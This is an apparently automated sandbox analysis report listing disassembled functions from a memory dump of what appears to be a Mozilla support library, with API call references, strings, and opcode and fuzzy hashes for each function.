AcquireSRWLockExclusive.KERNEL32(?), ref: 6C9AD53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9AD55F
free.MOZGLUE(00000000), ref: 6C9AD585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C9AD5D3
GetCurrentThreadId.KERNEL32 ref: 6C9AD5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C9AD605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9AD652
GetCurrentThreadId.KERNEL32 ref: 6C9AD658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C9AD667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9AD6A2

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: 92ef6caa1a516a407137336b66fef06897dc76b776a3bfbcb36d562016187863
Instruction ID: 68bd373f28a8817a722e4300504dce52bd0854999d4ed2a5bf06be0fe8af245e
Opcode Fuzzy Hash: 92ef6caa1a516a407137336b66fef06897dc76b776a3bfbcb36d562016187863
Instruction Fuzzy Hash: 92516CB1608B05DFC704DF65C484A9ABBB4FF89358F108A2EE95A97710DB30F985CB91

Function 6C975670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C9756D1
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C9756E9
?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C9756F1
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C975744
??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C9757BC
GetTickCount64.KERNEL32 ref: 6C9758CB
EnterCriticalSection.KERNEL32(6C9DF688), ref: 6C9758F3
__aulldiv.LIBCMT ref: 6C975945
LeaveCriticalSection.KERNEL32(6C9DF688), ref: 6C9759B2
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C9DF638,?,?,?,?), ref: 6C9759E9

Strings

MOZ_APP_RESTART, xrefs: 6C9756CC

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
String ID: MOZ_APP_RESTART
API String ID: 2752551254-2657566371
Opcode ID: 1422a52247983133444d46003c9a7ab35bdaac4d537a3addc9463b15dad1ce90
Instruction ID: bb7ff651eae94081bea50f32eb7a2595acfb432eff971e952c837c617aba6349
Opcode Fuzzy Hash: 1422a52247983133444d46003c9a7ab35bdaac4d537a3addc9463b15dad1ce90
Instruction Fuzzy Hash: 39C17B31A0D7449BDB05CF28C44166AB7F1BFDA718F558A1DE8C4A7A60E730E885CB92

Function 6C99EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C964A68), ref: 6C99945E
Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C999470
Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C999482
Part of subcall function 6C999420: __Init_thread_footer.LIBCMT ref: 6C99949F

GetCurrentThreadId.KERNEL32 ref: 6C99EC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C99EC8C

Part of subcall function 6C9994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9994EE
Part of subcall function 6C9994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C999508

GetCurrentThreadId.KERNEL32 ref: 6C99ECA1
AcquireSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C99ECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C99ECC5
ReleaseSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C99ED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C99ED19
CloseHandle.KERNEL32(?), ref: 6C99ED28
free.MOZGLUE(00000000), ref: 6C99ED2F
ReleaseSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C99ED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6C99EC94

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: d4937314aa601eec71b819a7b99e2bd8cff1d8a644b01e99f89ccfb1b1409e4e
Instruction ID: 70f63d3fafa89faf754d6faa4af9d2e5a158a95f6ecc2334fac8ed53db4be5fc
Opcode Fuzzy Hash: d4937314aa601eec71b819a7b99e2bd8cff1d8a644b01e99f89ccfb1b1409e4e
Instruction Fuzzy Hash: C121E575604904AFDB009F64DC09A9A3779FB5626DF288210FD18A7B41DB31E845CBF1

Function 6C998ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 6C95EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C95EB83

?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C99B392,?,?,00000001), ref: 6C9991F4

Part of subcall function 6C98CBE8: GetCurrentProcess.KERNEL32(?,6C9531A7), ref: 6C98CBF1
Part of subcall function 6C98CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9531A7), ref: 6C98CBFA

Strings

marker-table, xrefs: 6C99906C
timeline-fileio, xrefs: 6C9990A4
name, xrefs: 6C998F16
data, xrefs: 6C9990E8
stack-chart, xrefs: 6C9990B2
timeline-ipc, xrefs: 6C999096
timeline-memory, xrefs: 6C999088
timeline-overview, xrefs: 6C99907A
marker-chart, xrefs: 6C99905E

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
API String ID: 3790164461-3347204862
Opcode ID: cc90420369a66cf8a08d1e553cab1106601618aaf05d94b7e8b8fdcd7246b513
Instruction ID: 618ba5d754fdee7efc7bfc10d229741b723f6b50baf2371298d3e58226ead686
Opcode Fuzzy Hash: cc90420369a66cf8a08d1e553cab1106601618aaf05d94b7e8b8fdcd7246b513
Instruction Fuzzy Hash: 70B1D0B1B012099BDF04CF95C4917AEBBB9BF94318F254019D506ABF80D731EA55CBE2

Function 6C97C570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C97C5A3
WideCharToMultiByte.KERNEL32 ref: 6C97C9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C97C9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C97CA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C97CA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C97CAA5

Strings

(null), xrefs: 6C97C596
0, xrefs: 6C97D30A

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: 0324a7c0cdf1862f30eface0011c21295c04e9f75ffda72836644bdf86138f2d
Instruction ID: 1e302c6cb67bae7911c58ead7639e4d65c65649c2d40d78be8b09cfda47b0d90
Opcode Fuzzy Hash: 0324a7c0cdf1862f30eface0011c21295c04e9f75ffda72836644bdf86138f2d
Instruction Fuzzy Hash: FFA1AC3160A342DFDB20DF28C58475ABBF5AF89748F14892DE889D7741DB31E905CBA2

Function 6C97C769 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 159COMMON

Download Yara Rule

APIs

islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C97C784
_dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C97C801
_dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C97C83D
?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C97C891

Strings

INF, xrefs: 6C97C794
NAN, xrefs: 6C97C7AD
inf, xrefs: 6C97C78F
nan, xrefs: 6C97C7A8

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
String ID: INF$NAN$inf$nan
API String ID: 1991403756-4166689840
Opcode ID: 66aa5a0833324fa60b0de82abf3715e460e1bc783501e651ab6a1b86c527e2a3
Instruction ID: 2f305e3f688d0ed2e8eb71c9c224969827342a6f33d9ce131dc7cd59fbb20936
Opcode Fuzzy Hash: 66aa5a0833324fa60b0de82abf3715e460e1bc783501e651ab6a1b86c527e2a3
Instruction Fuzzy Hash: 825181716097408BDB10DF6CC48129AFBF4BF9A304F008A2DE9D5A7651E770D985CB52

Function 6C954480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6C994843,?), ref: 6C9545F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6C994843,?), ref: 6C95468A
free.MOZGLUE(?,?,?,?,?,?,6C994843,?), ref: 6C9546C9
free.MOZGLUE(?), ref: 6C9546EF
free.MOZGLUE(?), ref: 6C954712
free.MOZGLUE(?), ref: 6C954735
free.MOZGLUE(?), ref: 6C954758
free.MOZGLUE(?), ref: 6C95477B
free.MOZGLUE(?), ref: 6C95479E

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: 1297ab7353abfaaf5ee4baef0893af31b347e8342cbd31d04d5094d9dc3d3efa
Instruction ID: d983f65b9de8d24cbfc5b157c8a1ff2378b82593203f650b9622bf2c08de5b40
Opcode Fuzzy Hash: 1297ab7353abfaaf5ee4baef0893af31b347e8342cbd31d04d5094d9dc3d3efa
Instruction Fuzzy Hash: BFB1F171A011118FDB58CF3CC89076D76A6AF42328F980668E916DBBC6D730D8748F92

Function 6C9BAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6C9BAC52
CreateFileMappingW.KERNEL32 ref: 6C9BAC7D
GetSystemInfo.KERNEL32 ref: 6C9BAC98
MapViewOfFile.KERNEL32 ref: 6C9BACB0
GetSystemInfo.KERNEL32 ref: 6C9BACCD
MapViewOfFile.KERNEL32 ref: 6C9BAD05
UnmapViewOfFile.KERNEL32 ref: 6C9BAD1C
CloseHandle.KERNEL32 ref: 6C9BAD28
UnmapViewOfFile.KERNEL32 ref: 6C9BAD37
CloseHandle.KERNEL32 ref: 6C9BAD43
CloseHandle.KERNEL32 ref: 6C9BAD67

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: 8d8511822635d51785a2e82fc9c84ed3b87707babbf5359f1c9fc8f3c1720869
Instruction ID: 9df12873fcc3f648080faf1df3ee66efcb02c3aae138d4fd81af54b2714c495e
Opcode Fuzzy Hash: 8d8511822635d51785a2e82fc9c84ed3b87707babbf5359f1c9fc8f3c1720869
Instruction Fuzzy Hash: 0F3180B19087059FDB00AF7CC64826EBBF0BF85305F114A2DE985A7211EF70A588CB92

Function 6C969620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C969675
__Init_thread_footer.LIBCMT ref: 6C969697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C9696E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C969707
__Init_thread_footer.LIBCMT ref: 6C96971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C969773

Part of subcall function 6C98AB89: EnterCriticalSection.KERNEL32(6C9DE370,?,?,?,6C9534DE,6C9DF6CC,?,?,?,?,?,?,?,6C953284), ref: 6C98AB94
Part of subcall function 6C98AB89: LeaveCriticalSection.KERNEL32(6C9DE370,?,6C9534DE,6C9DF6CC,?,?,?,?,?,?,?,6C953284,?,?,6C9756F6), ref: 6C98ABD1

GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C9697B7
FreeLibrary.KERNEL32 ref: 6C9697D0
FreeLibrary.KERNEL32 ref: 6C9697EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C969824

Strings

NtMapViewOfSection, xrefs: 6C969701
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C969670
ntdll.dll, xrefs: 6C9696E3
MapViewOfFileNuma2, xrefs: 6C9697B1

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 409848716-3880535382
Opcode ID: 07f587d06aec6f2552e753c9200bd7a47f90861dcd5374c574285589249b8f08
Instruction ID: 71d99af88873ccbb9ca1b5f81e71a8ad70b3f8e4eb83b59b7db1030189233b34
Opcode Fuzzy Hash: 07f587d06aec6f2552e753c9200bd7a47f90861dcd5374c574285589249b8f08
Instruction Fuzzy Hash: C741B5717046069BEF00CFA5D885AD6B7B4FB49B68F228529ED15A7B80D730F844CBA1

Function 6C951E90 Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C9DE784), ref: 6C951EC1
LeaveCriticalSection.KERNEL32(6C9DE784), ref: 6C951EE1
EnterCriticalSection.KERNEL32(6C9DE744), ref: 6C951F38
LeaveCriticalSection.KERNEL32(6C9DE744), ref: 6C951F5C
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C951F83
LeaveCriticalSection.KERNEL32(6C9DE784), ref: 6C951FC0
EnterCriticalSection.KERNEL32(6C9DE784), ref: 6C951FE2
LeaveCriticalSection.KERNEL32(6C9DE784), ref: 6C951FF6
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C952019

Strings

MOZ_CRASH(), xrefs: 6C952000

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
String ID: MOZ_CRASH()
API String ID: 2055633661-2608361144
Opcode ID: 0713831c05c8217e61b84f73bfb1f5c9043a8f03b0b37e7e13a824b15927fe6d
Instruction ID: c0ba08201beb5524a2ff095b18dfa91ea132a3dff9d0115627b3d99dc1c6d19f
Opcode Fuzzy Hash: 0713831c05c8217e61b84f73bfb1f5c9043a8f03b0b37e7e13a824b15927fe6d
Instruction Fuzzy Hash: DA41F371B05B0A8BDB40DFB8C884B6A7BB5EB5A748F110129ED04A7740D771E854CBD5

Function 6C9A0000 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 127threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C964A68), ref: 6C99945E
Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C999470
Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C999482
Part of subcall function 6C999420: __Init_thread_footer.LIBCMT ref: 6C99949F

GetCurrentThreadId.KERNEL32 ref: 6C9A0039
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9A0041
GetCurrentThreadId.KERNEL32 ref: 6C9A0075
AcquireSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C9A0082
moz_xmalloc.MOZGLUE(00000048), ref: 6C9A0090
free.MOZGLUE(?), ref: 6C9A0104
ReleaseSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C9A011B

Strings

[D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6C9A005B

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
API String ID: 3012294017-637075127
Opcode ID: bc9cb17663f71158531a247729265b75e654866f0264ead2e80d2e8030270071
Instruction ID: 9fc5920f83300a954fcd4109903853ec2444afa5f56ec9c2042d045a4a361f37
Opcode Fuzzy Hash: bc9cb17663f71158531a247729265b75e654866f0264ead2e80d2e8030270071
Instruction Fuzzy Hash: 5E41EFB1604A54DFCB10CF64C844A9ABBF0FF69318F14491EE94AA3B40DB31F955CBA2

Function 6C967E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C967EA7
malloc.MOZGLUE(00000001), ref: 6C967EB3

Part of subcall function 6C96CAB0: EnterCriticalSection.KERNEL32(?), ref: 6C96CB49
Part of subcall function 6C96CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C96CBB6

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C967EC4
mozalloc_abort.MOZGLUE(?), ref: 6C967F19
malloc.MOZGLUE(?), ref: 6C967F36
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C967F4D

Strings

d, xrefs: 6C967F89

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
String ID: d
API String ID: 204725295-2564639436
Opcode ID: c2c08429d022bb8c4b17198f086a4237d06d0c694b8b4a6cb08993755985ff93
Instruction ID: f71660a51bfc7c33d6af84959794149133f3c219dc61652618b1c921e0ce54c1
Opcode Fuzzy Hash: c2c08429d022bb8c4b17198f086a4237d06d0c694b8b4a6cb08993755985ff93
Instruction Fuzzy Hash: 77310962E0468897EB009B29CC049FEB778EFA6208F155629ED4957752FB30E6C8C391

Function 6C963E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6C963EEE
RtlFreeHeap.NTDLL ref: 6C963FDC
RtlAllocateHeap.NTDLL(?,00000000,00000040), ref: 6C964006
RtlFreeHeap.NTDLL ref: 6C9640A1
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C963CCC), ref: 6C9640AF
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C963CCC), ref: 6C9640C2
RtlFreeHeap.NTDLL ref: 6C964134
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,?,?,?,?,6C963CCC), ref: 6C964143
RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,?,?,?,?,6C963CCC), ref: 6C964157

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Free$Heap$StringUnicode$Allocate
String ID:
API String ID: 3680524765-0
Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction ID: 674c412cf7787f45c8908d4493b16a1839ee3ed121a15ec08fd5a2d23c6253d4
Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction Fuzzy Hash: ECA193B1A00215CFEB40CF6AC880669BBF5FF58308F254159D909AFB82D771E956CFA1

Function 6C952030 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,6C973F47,?,?,?,6C973F47,6C971A70,?), ref: 6C95207F
memset.VCRUNTIME140(?,000000E5,6C973F47,?,6C973F47,6C971A70,?), ref: 6C9520DD
VirtualFree.KERNEL32(00100000,00100000,00004000,?,6C973F47,6C971A70,?), ref: 6C95211A
EnterCriticalSection.KERNEL32(6C9DE744,?,6C973F47,6C971A70,?), ref: 6C952145
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6C973F47,6C971A70,?), ref: 6C9521BA
EnterCriticalSection.KERNEL32(6C9DE744,?,6C973F47,6C971A70,?), ref: 6C9521E0
LeaveCriticalSection.KERNEL32(6C9DE744,?,6C973F47,6C971A70,?), ref: 6C952232

Strings

MOZ_CRASH(), xrefs: 6C95227D
MOZ_RELEASE_ASSERT(node->mArena == this), xrefs: 6C952253, 6C952268

Memory Dump Source

